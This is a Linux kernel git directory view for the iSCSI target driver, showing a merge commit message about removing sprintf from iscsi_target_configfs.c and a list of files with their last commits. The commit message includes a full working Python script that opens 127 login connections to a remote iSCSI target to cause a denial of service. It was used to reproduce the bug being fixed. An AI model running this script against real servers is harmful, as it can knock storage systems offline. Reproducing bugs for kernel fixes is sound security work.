linux-stable/drivers/target/iscsi
Martin K. Petersen 31799f9e6a Merge patch series "scsi: target: iscsi: Get rid of sprintf in iscsi_target_configfs.c"
Konstantin Shelekhin <k.shelekhin@yadro.com> says:

This patch series cleanses iscsi_target_configfs.c of sprintf
usage. The first patch fixes the real problem, the second just makes
sure we are on the safe side from now on.

I've reproduced the issue fixed in the first patch by utilizing this
cool thing:

  https://git.sr.ht/~kshelekhin/scapy-iscsi

Yeah, shameless promoting of my own tools, but I like the simplicity
of scapy and writing tests in C with libiscsi can be a little
cumbersome.

Check it out:

  #!/usr/bin/env python3
  # Let's cause some DoS in iSCSI target

  import sys

  from scapy.supersocket import StreamSocket
  from scapy_iscsi.iscsi import *

  cpr = {
      "InitiatorName": "iqn.2016-04.com.open-iscsi:e476cd9e4e59",
      "TargetName": "iqn.2023-07.com.example:target",
      "HeaderDigest": "None",
      "DataDigest": "None",
  }

  spr = {
      "SessionType": "Normal",
      "ErrorRecoveryLevel": 0,
      "DefaultTime2Retain": 0,
      "DefaultTime2Wait": 2,
      "ImmediateData": "Yes",
      "FirstBurstLength": 65536,
      "MaxBurstLength": 262144,
      "MaxRecvDataSegmentLength": 262144,
      "MaxOutstandingR2T": 1,
  }

  if len(sys.argv) != 3:
      print("usage: dos.py <host> <port>", file=sys.stderr)
      exit(1)

  host = sys.argv[1]
  port = int(sys.argv[2])
  isid = 0xB00B
  tsih = 0
  connections = []

  for i in range(0, 127):
      s = socket.socket()
      s.connect((host, port))
      s = StreamSocket(s, ISCSI)

      ds = cpr if i > 0 else cpr | spr
      lirq = ISCSI() / LoginRequest(isid=isid, tsih=tsih, cid=i, ds=kv2text(ds))
      lirs = s.sr1(lirq)
      tsih = lirs.tsih

      connections.append(s)

  input()

Link: https://lore.kernel.org/r/20230722152657.168859-1-k.shelekhin@yadro.com
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
2023-07-31 12:11:17 -04:00
..
cxgbit treewide: use get_random_u32() when possible 2022-10-11 17:42:58 -06:00
iscsi_target_auth.c scsi: target: iscsi: Do not require target authentication 2022-07-26 22:13:29 -04:00
iscsi_target_auth.h scsi: target: iscsi: Rename iscsi_conn to iscsit_conn 2022-05-10 22:32:20 -04:00
iscsi_target_configfs.c Merge patch series "scsi: target: iscsi: Get rid of sprintf in iscsi_target_configfs.c" 2023-07-31 12:11:17 -04:00
iscsi_target_datain_values.c scsi: target: iscsi: Rename iscsi_conn to iscsit_conn 2022-05-10 22:32:20 -04:00
iscsi_target_datain_values.h scsi: target: iscsi: Rename iscsi_cmd to iscsit_cmd 2022-05-10 22:32:20 -04:00
iscsi_target_device.c scsi: target: iscsi: Rename iscsi_session to iscsit_session 2022-05-10 22:32:21 -04:00
iscsi_target_device.h scsi: target: iscsi: Rename iscsi_session to iscsit_session 2022-05-10 22:32:21 -04:00
iscsi_target_erl0.c scsi: target: iscsi: Rename iscsi_session to iscsit_session 2022-05-10 22:32:21 -04:00
iscsi_target_erl0.h scsi: target: iscsi: Rename iscsi_session to iscsit_session 2022-05-10 22:32:21 -04:00
iscsi_target_erl1.c scsi: target: iscsi: Rename iscsi_session to iscsit_session 2022-05-10 22:32:21 -04:00
iscsi_target_erl1.h scsi: target: iscsi: Rename iscsi_session to iscsit_session 2022-05-10 22:32:21 -04:00
iscsi_target_erl2.c scsi: target: iscsi: Rename iscsi_session to iscsit_session 2022-05-10 22:32:21 -04:00
iscsi_target_erl2.h scsi: target: iscsi: Rename iscsi_session to iscsit_session 2022-05-10 22:32:21 -04:00
iscsi_target_login.c scsi: target: iscsi: Fix hang in the iSCSI login code 2023-05-22 16:29:39 -04:00
iscsi_target_login.h scsi: target: iscsi: Rename iscsi_conn to iscsit_conn 2022-05-10 22:32:20 -04:00
iscsi_target_nego.c scsi: target: iscsi: Prevent login threads from racing between each other 2023-05-22 16:29:39 -04:00
iscsi_target_nego.h scsi: target: iscsi: Allow AuthMethod=None 2022-07-26 22:13:28 -04:00
iscsi_target_nodeattrib.c scsi: target: iscsi: Control authentication per ACL 2022-06-07 21:55:11 -04:00
iscsi_target_nodeattrib.h License cleanup: add SPDX GPL-2.0 license identifier to files with no license 2017-11-02 11:10:55 +01:00
iscsi_target_parameters.c scsi: target: Replace all non-returning strlcpy() with strscpy() 2023-05-16 21:39:44 -04:00
iscsi_target_parameters.h scsi: target: iscsi: Rename iscsi_conn to iscsit_conn 2022-05-10 22:32:20 -04:00
iscsi_target_seq_pdu_list.c scsi: target: iscsi: Rename iscsi_session to iscsit_session 2022-05-10 22:32:21 -04:00
iscsi_target_seq_pdu_list.h scsi: target: iscsi: Rename iscsi_cmd to iscsit_cmd 2022-05-10 22:32:20 -04:00
iscsi_target_stat.c scsi: target: iscsi: Rename iscsi_session to iscsit_session 2022-05-10 22:32:21 -04:00
iscsi_target_tmr.c scsi: target: iscsi: Rename iscsi_session to iscsit_session 2022-05-10 22:32:21 -04:00
iscsi_target_tmr.h scsi: target: iscsi: Rename iscsi_conn to iscsit_conn 2022-05-10 22:32:20 -04:00
iscsi_target_tpg.c scsi: target: iscsi: Remove the unused netif_timeout attribute 2023-07-11 12:33:32 -04:00
iscsi_target_tpg.h scsi: target: iscsi: Remove the unused netif_timeout attribute 2023-07-11 12:33:32 -04:00
iscsi_target_transport.c scsi: target: Make iscsit_register_transport() return void 2020-08-04 20:56:56 -04:00
iscsi_target_util.c SCSI misc on 20230629 2023-06-30 11:57:07 -07:00
iscsi_target_util.h scsi: target: iscsi: Fix hang in the iSCSI login code 2023-05-22 16:29:39 -04:00
iscsi_target.c scsi: target: iscsi: Fix hang in the iSCSI login code 2023-05-22 16:29:39 -04:00
iscsi_target.h scsi: target: iscsi: Rename iscsi_session to iscsit_session 2022-05-10 22:32:21 -04:00
Kconfig net: add sock_set_reuseaddr 2020-05-28 11:11:44 -07:00
Makefile License cleanup: add SPDX GPL-2.0 license identifier to files with no license 2017-11-02 11:10:55 +01:00